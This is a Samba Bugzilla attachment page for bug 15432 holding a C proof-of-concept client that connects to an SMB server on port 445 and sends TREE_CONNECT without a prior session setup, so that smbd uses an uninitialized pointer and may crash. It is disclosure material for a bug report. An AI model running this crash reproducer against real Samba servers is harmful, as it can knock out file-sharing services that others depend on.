The Samba-Bugzilla – Attachment 17997 Details for
Bug 15432
TREE_CONNECT without SETUP causes smbd to use uninitialized pointer
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
client that sends TREE_CONNECT without SETUP, potentially crashing smbd
smbd13c.c (text/x-csrc), 22.66 KB, created by
Robert Morris
on 2023-07-24 20:49:42 UTC
(
hide
)
Description:
client that sends TREE_CONNECT without SETUP, potentially crashing smbd
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2023-07-24 20:49:42 UTC
Size:
22.66 KB
patch
obsolete
>#include <stdio.h> >#include <string.h> >#include <stdlib.h> >#include <unistd.h> >#include <sys/socket.h> >#include <sys/ioctl.h> >#include <netinet/in.h> >#include <sys/wait.h> >#include <sys/resource.h> >#include <arpa/inet.h> >#include <assert.h> >#include <ctype.h> >#include <fcntl.h> >#include <signal.h> > >char *server_ip = "127.0.0.1"; >char *username = "z"; >char *password = "xxxxxxxx"; >char *share_path = "x"; >//char *share_path = "IPC$"; >char *share_service = "A:"; >//char *share_service = "IPC"; > >int s = -1; >int uid = 0; >int tid = 0; >int fid = 0; > >unsigned int header_flags = 0; >unsigned int header_flags2 = 0; > >int >header(char *buf, int command) >{ > int ii = 0; > > // SMB-over-TCP 4-byte header > buf[ii++] = 0; // must be zero > buf[ii++] = 0; // high byte of len > *(short*)(buf+ii) = htons(sizeof(buf)-4); // non-inclusive len, filled later > ii += 2; > > // 32-byte SMB header, MS-CIFS 2.2.3.1 > buf[ii++] = 0xff; > buf[ii++] = 'S'; > buf[ii++] = 'M'; > buf[ii++] = 'B'; > buf[ii++] = command; > buf[ii++] = 0; // status > buf[ii++] = 0; // status > buf[ii++] = 0; // status > buf[ii++] = 0; // status > buf[ii++] = header_flags; // flags > *(short*)(buf+ii) = header_flags2; // flags2 > ii += 2; > *(short*)(buf+ii) = 0; // PIDHigh > ii += 2; > ii += 8; // SecurityFeatures > *(short*)(buf+ii) = 0; // Reserved > ii += 2; > *(short*)(buf+ii) = tid; // TID > ii += 2; > *(short*)(buf+ii) = 0; // PIDLow > ii += 2; > *(short*)(buf+ii) = uid; // UID > ii += 2; > *(short*)(buf+ii) = 0; // MID > ii += 2; > > return ii; >} > >int >readn(void *bufx, int n) >{ > char *buf = bufx; > while(n > 0){ > int cc = read(s, buf, n); > if(cc <= 0) > return -1; > n -= cc; > buf += cc; > } > return 0; >} > >int >readmsg(void *bufx) >{ > unsigned char *buf = bufx; > if(readn(buf, 4) < 0) > return -1; > int n = (buf[2] << 8) | buf[3]; > if(readn(buf+4, n) < 0) > return -1; > return n + 4; >} > >void >negotiate(const char *dialect) >{ > // SMB_COM_NEGOTIATE > // dialect should probably be "NT LM 0.12" > { > char buf[128]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x72); > > // parameter block, MS-CIFS 2.2.3.2 > int param_words = 0; > buf[ii++] = param_words; // number of 16-bit words of parameters > printf("parameters start at %d\n", ii); > ii += param_words*2; > > // data block, MS-CIFS 2.2.3.3 > // SMB_COM_NEGOTIATE MS-CIFS 2.2.4.52 > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > buf[ii++] = 0x02; // BufferFormat > memcpy(buf+ii, dialect, strlen(dialect) + 1); > ii += strlen(dialect) + 1; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); // this works > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("negotiate writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > // read negotiate response, MS-CIFS 2.2.4.52.2 > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for negotiate response (expecting 87)\n", cc); > printf("WordCount %d (expecting 17)\n", buf[36] & 0xff); > printf("DialectIndex %d (expecting 0)\n", *(short*)(buf+37)); > printf("SecurityMode 0x%x (expecting 0x1)\n", buf[37+2]); > } >} > >void >setup() >{ > // SMB_COM_SESSION_SETUP_ANDX > // MS-CIFS 3.2.4.2.3 > { > char buf[128]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x73); > > // parameter block, MS-CIFS 2.2.4.53.1 > int param_words = 13; > buf[ii++] = param_words; // number of 16-bit words of parameters > // ii is 37 at this point > buf[ii++] = 0xff; // AndXCommand (next command) 0xff means none > buf[ii++] = 0; // Reserved > *(short*)(buf+ii) = 0; // AndXOffset > ii += 2; > *(short*)(buf+ii) = 8192; // MaxBufferSize > ii += 2; > *(short*)(buf+ii) = 2; // MaxMpxCount > ii += 2; > *(short*)(buf+ii) = 0; // VcNumber > ii += 2; > *(int*)(buf+ii) = 0; // SessionKey, from negotiate response XXX > ii += 4; > *(short*)(buf+ii) = 8; // OEMPasswordLen > ii += 2; > *(short*)(buf+ii) = 0; // UnicodePasswordLen > ii += 2; > *(int*)(buf+ii) = 0; // Reserved > ii += 4; > *(int*)(buf+ii) = 0; // Capabilities > ii += 4; > > // data block > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > // OEMPassword > memcpy(buf+ii, password, 8); > ii += 8; > // UnicodePassword > //memcpy(buf+ii, password, 8); > //ii += 8; > // pad > if(ii % 1) > ii++; > // AccountName > memcpy(buf+ii, username, strlen(username) + 1); > ii += strlen(username) + 1; > // PrimaryDomain > buf[ii++] = '\0'; > // NativeOS > buf[ii++] = '\0'; > // NativeLanMan > buf[ii++] = '\0'; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("setup writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > // read session setup response, MS-CIFS 2.2.4.53.2 > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for session setup response\n", cc); > printf("WordCount %d\n", buf[36] & 0xff); > printf("Action %d (expecting 0)\n", *(short*)(buf+41)); > uid = *(short*)(buf+32); > uid &= 0xffff; > printf("UID 0x%x\n", uid); > } >} > >void >tree_connect_andx() >{ > // SMB_COM_TREE_CONNECT_ANDX, MS-CIFS 2.2.4.55 > { > char buf[128]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x75); > > // parameter block, MS-CIFS 2.2.4.53.1 > int param_words = 4; > buf[ii++] = param_words; // number of 16-bit words of parameters > // ii is 37 at this point > buf[ii++] = 0xff; // AndXCommand > buf[ii++] = 0; // Reserved > *(short*)(buf+ii) = 0; // AndXOffset > ii += 2; > *(short*)(buf+ii) = 0; // Flags > ii += 2; > *(short*)(buf+ii) = 1; // PasswordLength > ii += 2; > > // data block > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > buf[ii++] = '\0'; // password > memcpy(buf+ii, share_path, strlen(share_path)+1); > ii += strlen(share_path)+1; > memcpy(buf+ii, share_service, strlen(share_service)+1); > ii += strlen(share_service)+1; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("tree_connect_andx writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > // read tree connect response, MS-CIFS 2.2.4.55.2 > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for tree_connect_andx response\n", cc); > tid = *(short*)(buf+28); > tid &= 0xffff; > printf("TID 0x%x\n", tid); > } >} > >void >tree_connect() >{ > // SMB_COM_TREE_CONNECT, MS-CIFS 2.2.4.50 > { > char buf[128]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x70); > > buf[ii++] = 0; // number of 16-bit words of parameters > > // data block > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > > buf[ii++] = 0x04; // BufferFormat > memcpy(buf+ii, share_path, strlen(share_path)+1); > ii += strlen(share_path)+1; > > buf[ii++] = 0x04; // BufferFormat > buf[ii++] = '\0'; // password > > buf[ii++] = 0x04; // BufferFormat > memcpy(buf+ii, share_service, strlen(share_service)+1); > ii += strlen(share_service)+1; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("tree_connect writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > // read tree connect response, MS-CIFS 2.2.4.55.2 > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for tree connect response\n", cc); > tid = *(short*)(buf+28); > tid &= 0xffff; > printf("TID 0x%x\n", tid); > } >} > >void >nt_create() >{ > // SMB_COM_NT_CREATE_ANDX, MS-CIFS 2.2.4.64 > { > char buf[128]; > memset(buf, 0xff, sizeof(buf)); > > int ii = header(buf, 0xa2); > > // parameter block > int param_words = 0x18; > buf[ii++] = param_words; // number of 16-bit words of parameters > // ii is 37 at this point > > buf[ii++] = 0xff; // AndXCommand > buf[ii++] = 0; // Reserved > *(short*)(buf+ii) = 0; // AndXOffset > ii += 2; > buf[ii++] = 0; // Reserved > *(short*)(buf+ii) = 1; // NameLength > ii += 2; > *(int*)(buf+ii) = 0; // Flags > ii += 4; > *(int*)(buf+ii) = 0; // RootDirectoryFID > ii += 4; > *(int*)(buf+ii) = 7; // DesiredAccess > ii += 4; > memset(buf+ii, 0, 8); // AllocationSize > ii += 8; > *(int*)(buf+ii) = 0; // ExtFileAttributes > ii += 4; > *(int*)(buf+ii) = 7; // ShareAccess > ii += 4; > *(int*)(buf+ii) = 0; // CreateDisposition > ii += 4; > *(int*)(buf+ii) = 0; // CreateOptions > ii += 4; > *(int*)(buf+ii) = 0; // ImpersonationLevel > ii += 4; > buf[ii++] = 0; // SecurityFlags > > // data block > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > buf[ii++] = 'f'; // FileName > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("nt_create writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > // read nt_create response > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for nt_create response\n", cc); > fid = *(short*)(buf + 42); > fid &= 0xffff; > printf("FID 0x%04x\n", fid); > } >} > >void >check_directory(char *name) >{ > // SMB_COM_CHECK_DIRECTORY, MS-CIFS 2.2.4.17 > { > char buf[128]; > memset(buf, 0xff, sizeof(buf)); > > int ii = header(buf, 0x10); > > // parameter block > int param_words = 0x00; > buf[ii++] = param_words; // number of 16-bit words of parameters > // ii is 37 at this point > > // data block > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > buf[ii++] = 0x04; // SMB_STRING > memcpy(buf+ii, name, strlen(name) + 1); > ii += strlen(name) + 1; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("check_directory writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for check_directory response\n", cc); > printf("check_directory Status 0x%x\n", *(unsigned int*)(buf+9)); > } >} > >void >smb_ioctl() >{ > // SMB_COM_IOCTL, MS-CIFS 2.2.4.35 > { > char buf[128]; > memset(buf, 0xff, sizeof(buf)); > > int ii = header(buf, 0x27); > > // parameter block > int param_words = 0x0e; > buf[ii++] = param_words; // number of 16-bit words of parameters > // ii is 37 at this point > > *(short*)(buf+ii) = fid; // FID > ii += 2; > *(short*)(buf+ii) = 0x53; // Category > ii += 2; > *(short*)(buf+ii) = 0x60; // Function > ii += 2; > *(short*)(buf+ii) = 8; // TotalParameterCount > ii += 2; > *(short*)(buf+ii) = 8; // TotalDataCount > ii += 2; > *(short*)(buf+ii) = 8; // MaxParameterCount > ii += 2; > *(short*)(buf+ii) = 8; // MaxDataCount > ii += 2; > *(int*)(buf+ii) = 1000000; // Timeout (ms) > ii += 4; > *(short*)(buf+ii) = 0; // Reserved > ii += 2; > *(short*)(buf+ii) = 8; // ParameterCount > ii += 2; > *(short*)(buf+ii) = 0; // ParameterOffset > ii += 2; > *(short*)(buf+ii) = 8; // DataCount > ii += 2; > *(short*)(buf+ii) = 0; // DataOffset > ii += 2; > > // data block > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > ii += 48; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("ioctl writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for ioctl response\n", cc); > } >} > >void >transaction2() >{ > // SMB_COM_TRANSACTION2, MS-CIFS 2.2.4.46 > { > char buf[256]; > memset(buf, 0xff, sizeof(buf)); > > int ii = header(buf, 0x32); > > // parameter block > int param_words = 14 + 1; // 14 + SetupCount > buf[ii++] = param_words; // number of 16-bit words of parameters > // ii is 37 at this point > > *(short*)(buf+ii) = 32; // TotalParameterCount > ii += 2; > *(short*)(buf+ii) = 15; // TotalDataCount > ii += 2; > *(short*)(buf+ii) = 256; // MaxParameterCount > ii += 2; > *(short*)(buf+ii) = 8192; // MaxDataCount > ii += 2; > buf[ii++] = 64; // MaxSetupCount > buf[ii++] = 0; // Reserved1 > *(short*)(buf+ii) = 0; // Flags > ii += 2; > *(int*)(buf+ii) = 1000000; // Timeout, in ms > ii += 4; > *(short*)(buf+ii) = 0; // Reserved2 > ii += 2; > *(short*)(buf+ii) = 32; // ParameterCount > ii += 2; > int parameter_offset_i = ii; > *(short*)(buf+ii) = 32; // ParameterOffset XXX > ii += 2; > *(short*)(buf+ii) = 15; // DataCount > ii += 2; > int data_offset_i = ii; > *(short*)(buf+ii) = 32; // DataOffset > ii += 2; > buf[ii++] = 1; // SetupCount > buf[ii++] = 0; // Reserved3 > > // Setup words > *(short*)(buf+ii) = 0; // sub-command number -- TRANS2_OPEN2 > ii += 2; > > // data block > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > > buf[ii++] = 0; // Name > while(ii % 4) > ii++; // Pad1 > > *(short*)(buf+parameter_offset_i) = ii - 4; // ParameterOffset > > *(short*)(buf+ii) = 0; // Flags > ii += 2; > *(short*)(buf+ii) = 0; // AccessMode > ii += 2; > *(short*)(buf+ii) = 0; // Reserved1 > ii += 2; > *(short*)(buf+ii) = 0; // FileAttributes > ii += 2; > *(int*)(buf+ii) = 1; // CreationTime > ii += 4; > *(short*)(buf+ii) = 0x11; // OpenMode > ii += 2; > *(int*)(buf+ii) = 0; // AllocationSize > ii += 4; > memset(buf+ii, 0, 10); // Reserved > ii += 10; > char *name = "t"; > memcpy(buf+ii, name, strlen(name)+1); > ii += strlen(name) + 1; > > while(ii % 4) > ii++; // Pad2 > > *(short*)(buf+data_offset_i) = ii - 4; // DataOffset > > // Extended AttributeList > *(int*)(buf+ii) = 12; // SizeOfListInBytes > ii += 4; > buf[ii++] = 0; // ExtendedAttributeFlag > buf[ii++] = 3; // name length > *(short*)(buf+ii) = 3; // value length > ii += 2; > memcpy(buf+ii, "aaa", 4); > ii += 4; > memcpy(buf+ii, "bbb", 4); > ii += 4; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("transaction2 writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for transaction2 response\n", cc); > } >} > >void >nt_transaction() >{ > // SMB_COM_NT_TRANSACT, MS-CIFS 2.2.4.62 > { > char buf[256]; > memset(buf, 0xff, sizeof(buf)); > > int ii = header(buf, 0xa0); > > // parameter block > int param_words = 19 + 0; // 19 + SetupCount > buf[ii++] = param_words; // number of 16-bit words of parameters > // ii is 37 at this point > > buf[ii++] = 64; // MaxSetupCount > *(short*)(buf+ii) = 0; // Reserved1 > ii += 2; > *(int*)(buf+ii) = 54; // TotalParameterCount > ii += 4; > *(int*)(buf+ii) = 15; // TotalDataCount > ii += 4; > *(int*)(buf+ii) = 256; // MaxParameterCount > ii += 4; > *(int*)(buf+ii) = 8192; // MaxDataCount > ii += 4; > *(int*)(buf+ii) = 54; // ParameterCount > ii += 4; > int parameter_offset_i = ii; > *(int*)(buf+ii) = 32; // ParameterOffset XXX > ii += 4; > *(int*)(buf+ii) = 15; // DataCount > ii += 4; > int data_offset_i = ii; > *(int*)(buf+ii) = 32; // DataOffset > ii += 4; > buf[ii++] = 0; // SetupCount > *(short*)(buf+ii) = 1; // Function > ii += 2; > > // Setup words > *(short*)(buf+ii) = 0; > ii += 2; > > // data block > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > > while(ii % 4) > ii++; // Pad1 > > *(int*)(buf+parameter_offset_i) = ii - 4; // ParameterOffset > > *(int*)(buf+ii) = 0; // Flags > ii += 4; > *(int*)(buf+ii) = 0; // RootDirectoryFID > ii += 4; > *(int*)(buf+ii) = 7; // DesiredAccess > ii += 4; > memset(buf+ii, 0, 8); // AllocationSize > ii += 8; > *(int*)(buf+ii) = 0; // ExtFileAttributes > ii += 4; > *(int*)(buf+ii) = 7; // ShareAccess > ii += 4; > *(int*)(buf+ii) = 0; // CreateDisposition > ii += 4; > *(int*)(buf+ii) = 0; // CreateOptions > ii += 4; > *(int*)(buf+ii) = 0; // SecurityDescriptorLength > ii += 4; > *(int*)(buf+ii) = 0; // EALength > ii += 4; > *(int*)(buf+ii) = 1; // NameLength > ii += 4; > *(int*)(buf+ii) = 0; // ImpersonationLevel > ii += 4; > buf[ii++] = 0; // SecurityFlags > char *name = "t"; > memcpy(buf+ii, name, strlen(name)); > ii += strlen(name); > > while(ii % 4) > ii++; // Pad2 > > *(int*)(buf+data_offset_i) = ii - 4; // DataOffset > > // Extended AttributeList > *(int*)(buf+ii) = 12; // SizeOfListInBytes > ii += 4; > buf[ii++] = 0; // ExtendedAttributeFlag > buf[ii++] = 3; // name length > *(short*)(buf+ii) = 3; // value length > ii += 2; > memcpy(buf+ii, "aaa", 4); > ii += 4; > memcpy(buf+ii, "bbb", 4); > ii += 4; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("nt_transaction writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for nt_transaction response\n", cc); > } >} > >void >transaction() >{ > // SMB_COM_TRANSACTION, MS-CIFS 2.2.4.33 > { > char buf[256]; > memset(buf, 0xff, sizeof(buf)); > > int ii = header(buf, 0x25); > > // parameter block > int param_words = 14 + 2; // 14 + SetupCount > buf[ii++] = param_words; // number of 16-bit words of parameters > // ii is 37 at this point > > *(short*)(buf+ii) = 32; // TotalParameterCount > ii += 2; > *(short*)(buf+ii) = 15; // TotalDataCount > ii += 2; > *(short*)(buf+ii) = 256; // MaxParameterCount > ii += 2; > *(short*)(buf+ii) = 8192; // MaxDataCount > ii += 2; > buf[ii++] = 64; // MaxSetupCount > buf[ii++] = 0; // Reserved1 > *(short*)(buf+ii) = 0; // Flags > ii += 2; > *(int*)(buf+ii) = 1000000; // Timeout, in ms > ii += 4; > *(short*)(buf+ii) = 0; // Reserved2 > ii += 2; > *(short*)(buf+ii) = 32; // ParameterCount > ii += 2; > int parameter_offset_i = ii; > *(short*)(buf+ii) = 32; // ParameterOffset XXX > ii += 2; > *(short*)(buf+ii) = 15; // DataCount > ii += 2; > int data_offset_i = ii; > *(short*)(buf+ii) = 32; // DataOffset > ii += 2; > buf[ii++] = 2; // SetupCount > buf[ii++] = 0; // Reserved3 > > // Setup words > *(short*)(buf+ii) = 0; // ??? > ii += 2; > *(short*)(buf+ii) = fid; // ??? > ii += 2; > > // data block > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > > //char *pname = "\\pipe\\LANMAN"; > char *pname = "\\pipe\\"; > memcpy(buf+ii, pname, strlen(pname)+1); > ii += strlen(pname) + 1; > > while(ii % 4) > ii++; // Pad1 > > *(short*)(buf+parameter_offset_i) = ii - 4; // ParameterOffset > > *(short*)(buf+ii) = 1; // Flags > ii += 2; > *(short*)(buf+ii) = 0; // AccessMode > ii += 2; > *(short*)(buf+ii) = 0; // Reserved1 > ii += 2; > *(short*)(buf+ii) = 0; // FileAttributes > ii += 2; > *(int*)(buf+ii) = 1; // CreationTime > ii += 4; > *(short*)(buf+ii) = 0x11; // OpenMode > ii += 2; > *(int*)(buf+ii) = 0; // AllocationSize > ii += 4; > memset(buf+ii, 0, 10); // Reserved > ii += 10; > char *name2 = "t"; > memcpy(buf+ii, name2, strlen(name2)+1); > ii += strlen(name2) + 1; > > while(ii % 4) > ii++; // Pad2 > > *(short*)(buf+data_offset_i) = ii - 4; // DataOffset > > // Extended AttributeList > *(int*)(buf+ii) = 12; // SizeOfListInBytes > ii += 4; > buf[ii++] = 0; // ExtendedAttributeFlag > buf[ii++] = 3; // name length > *(short*)(buf+ii) = 3; // value length > ii += 2; > memcpy(buf+ii, "aaa", 4); > ii += 4; > memcpy(buf+ii, "bbb", 4); > ii += 4; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("transaction writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > // read nt_create response > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for transaction response\n", cc); > } >} > >void >smb_logoff() >{ > // SMB_COM_LOGOFF_ANDX, MS-CIFS 2.2.4.54 > { > char buf[256]; > memset(buf, 0xff, sizeof(buf)); > > int ii = header(buf, 0x74); > > // parameter block > buf[ii++] = 2; // number of 16-bit words of parameters > buf[ii++] = 0xff; // AndXCommand > buf[ii++] = 0; // Reserved > *(short*)(buf+ii) = (ii - 4 + 4); // AndXOffset > ii += 2; > > // data block > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("logoff writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for logoff response\n", cc); > } >} > >int >main() >{ > struct rlimit r; > r.rlim_cur = r.rlim_max = 0; > setrlimit(RLIMIT_CORE, &r); > > signal(SIGPIPE, SIG_IGN); > > struct sockaddr_in sin; > memset(&sin, 0, sizeof(sin)); > sin.sin_family = AF_INET; > sin.sin_port = htons(445); // SMB over TCP > sin.sin_addr.s_addr = inet_addr(server_ip); > > while(1){ > s = socket(AF_INET, SOCK_STREAM, 0); > if(connect(s, (struct sockaddr *)&sin, sizeof(sin)) == 0) > break; > close(s); > sleep(1); > } > > sleep(1); > > negotiate("NT LM 0.12"); > tree_connect(); > > close(s); >}
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=17997">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 15432
: 17997 |
18045
|
18054
|
18055
|
18056